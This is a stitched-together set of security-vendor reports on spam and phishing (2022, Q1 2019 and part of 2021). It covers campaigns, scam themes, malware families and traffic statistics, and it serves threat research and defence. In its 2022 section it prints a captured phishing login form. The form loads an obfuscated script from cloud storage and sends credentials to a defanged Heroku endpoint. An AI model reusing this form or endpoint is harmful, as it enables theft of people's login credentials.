This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. 
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. 
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails that month were spam.

On Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the same gradual shift in the ratio in favor of legitimate correspondence can be seen. We saw the largest share of spam in Runet in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed that month. The quietest month in Runet was December (47.18%), the same as globally.

### Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points.
Third place is still held by the United States (10.71%).

_TOP 20 countries and territories — sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That is an increase of 18 million from the previous year. The component was triggered most often in March, May, and June 2022.

_Number of Mail Anti-Virus hits, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), spread as archived electronic documents, moved down to third place. The fourth most common malware were exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%), a vulnerability in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits for the same component (1.80%).
This vulnerability was more widespread in 2021 and has now dropped to tenth place.

_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_

[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut it down in early 2021, but by fall the attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.

_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

### Countries and territories targeted by malicious mailings

Spain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), a slight decrease compared to 2021 (9.32%).
The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share of the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar, which was seventh in 2021, is in third place (12.04%). In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh.
Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

**Country/territory** | **Share of attacked users***
---|---
Vietnam | 17.03%
Macau | 13.88%
Madagascar | 12.04%
Algeria | 11.05%
Ecuador | 11.05%
Malawi | 10.91%
Brunei | 10.59%
Brazil | 10.57%
Morocco | 10.43%
Portugal | 10.33%

**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), though its share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

The ORG (3.89%) and TOP (1.80%) domains swapped places relative to 2021 but remained in fourth and fifth places. In addition, the top ten domain zones in most demand among cybercriminals included RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers.
The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

In 2022, pages impersonating delivery services accounted for the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round out the TOP 10 categories of sites of interest to criminals.

### Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users had increased dramatically: 44,700 in October, 83,100 in November and 125,000 in December.
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).

_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_

Notably, the majority of these phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, from March onward 70–90% of all attempts to follow phishing links by Telegram users were made by Russian users.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_

Phishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day.
The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)

**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place: over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.

_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_

Unlike on WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could exceed 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)

**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram.
Second place went to Brazil, where 3,800 clicks were blocked.

_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_

## Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we have seen an increase in targeted phishing attacks in which scammers do not move on to the phishing attack itself immediately, but only after several introductory emails involving active correspondence with the victim. This trend is likely to continue.
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

_Source record: "Spam and phishing in 2022", Securelist blog, published 2023-02-16, https://securelist.com/spam-phishing-scam-report-2022/108692/ (CVEs referenced: CVE-2017-11882, CVE-2018-0802)_

# Spam and phishing in Q1 2019

## Quarterly highlights

### Valentine's Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information, such as bank card details, out of starry-eyed users.
The topics exploited by cybercriminals ranged from online flower shops to dating sites.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)

### New Apple products

Late March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>))_

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)

_Fake Apple ID login pages_

Scammers polluted Internet traffic with phishing emails seemingly from Apple, trying to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)

### Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late.
Links to fake technical support sites (accompanied by rave reviews) can be seen on both dedicated forums and social networks.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)

_Fake "Kaspersky Lab support service" accounts_

All the profiles we detected in Q1 have one thing in common: they offer assistance in matters related to one company's products or another's, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not get their issue resolved, they are likely to be defrauded as well.

### New Instagram "features"

Last year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims, promising products or services at what seems a great price.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)

As usual in such schemes, the "buyer" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)

### Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists.
Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while at other times hacked sites redirected the victim to a fake authorization form.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)

### Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)

### "Dream job" offers from spammers

In Q3 2018, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing "dream job" offers. This quarter, we logged another major mailing topic: messages sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the "cloud service," the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing).
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)

### Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of "sextortion" — a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (they were actually harvested from social networks, online chats, forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the "employee" happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)

Playing on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc.
But this time, to make the message more convincing and intimidating, a CIA officer was used as the bogeyman.

### Malicious attacks on the corporate sector

In Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)

We also observed malicious mailings aimed at stealing the financial information of international companies by distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)

### Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message.
The email itself stated that the bank had introduced new security features that required the account details to be updated before use.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)

## Statistics: spam

### Proportion of spam in mail traffic

_Proportion of spam in global mail traffic, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>))_

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, almost identical (+0.07 p.p.) to Q4 2018.

_Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>))_

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

### Sources of spam by country

_Sources of spam by country, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>))_

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%).
The Top 10 is rounded off by Vietnam (2.18%).

### Spam email size

_Spam email size, Q4 2018 – Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>))_

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

### Malicious attachments: malware families

_TOP 10 malicious families in mail traffic, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>))_

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office, Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

### Countries targeted by malicious mailshots

_Countries targeted by malicious mailshots, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>))_

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

## Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites.
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.

### Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

_Geography of phishing attacks, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>))_

In second place, up from eighth, was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-placed Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%), which prop up the Top 5.

**Country** | **%***
---|---
Brazil | 21.66
Australia | 17.20
Spain | 16.96
Portugal | 16.81
Venezuela | 16.72
Greece | 15.86
Albania | 15.11
Ecuador | 14.99
Rwanda | 14.89
Georgia | 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

### Organizations under attack

_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p.
against Q4 last year to 25.78%.

_Distribution of organizations subjected to phishing attacks by category, Q1 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>))_

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).

## Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

_Source record: "Spam and phishing in Q1 2019", Securelist blog, published 2019-05-15, https://securelist.com/spam-and-phishing-in-q1-2019/90795/ (CVEs referenced: CVE-2017-11882, CVE-2018-0802)_

## Figures of the year

In 2021:

 * 45.56% of e-mails were spam
 * 24.77% of spam was sent from Russia with another 14.12% from Germany
 * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
 * The most common malware family found in attachments were Agensla Trojans
 * Our Anti-Phishing system
blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. 
In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. 
The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try your hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see that the ad is from someone they know rather than from some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. 
